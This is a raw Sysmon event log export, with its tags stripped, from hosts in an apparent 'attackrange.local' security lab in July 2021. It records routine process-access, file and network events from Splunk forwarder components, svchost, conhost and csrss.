08:01:26.906{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0312BD675765D0952A16A74218F50F9,SHA256=FA00F44C2FEE65B0B1AD3A3136C9E626EFE0E4B73CE129D191EE50F96BCBC76B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:26.266{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05AFC29DAAB47B1A8CE3BF0C1E996674,SHA256=D1BF4F2CD38F79CADBEA34B98B712FA5696AAD8FD59E93324463E256BC37A09D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809232Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D6-60EB-B579-00000000D001}3468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:26.422{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F6D6-60EB-B579-00000000D001}3468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.422{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D6-60EB-B579-00000000D001}3468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:26.407{0C1E0330-F6D6-60EB-B579-00000000D001}3468C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.938{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB482185CBB5B4761A25ED359E41E379,SHA256=45A4F00CE33E1A6936C7F14E3C7D82678A4E0553231D50DC194262115216B8B8,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001052393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:18.700{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51159-false10.0.1.12-8000- 23542300x80000000000000001052392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:27.285{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E7A64BDE8D93B0082DE1556CA3964E9,SHA256=DB4A9DD608BD992C6C693289579E0FF45AD937F823CAA0FAFEC70DE7CF614142,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.797{0C1E0330-F6D7-60EB-B779-00000000D001}31803236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D7-60EB-B779-00000000D001}3180C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 